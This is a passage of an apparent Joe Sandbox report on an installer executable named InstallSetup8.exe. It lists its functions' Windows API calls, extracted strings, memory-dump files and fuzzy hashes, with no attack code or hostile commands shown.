SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00428E20,74DF23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00428E20,74DF23A0), ref: 004067B8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Uniqueness

Uniqueness Score: -1.00%

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(0023DACD,00000064,0023DAD1), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

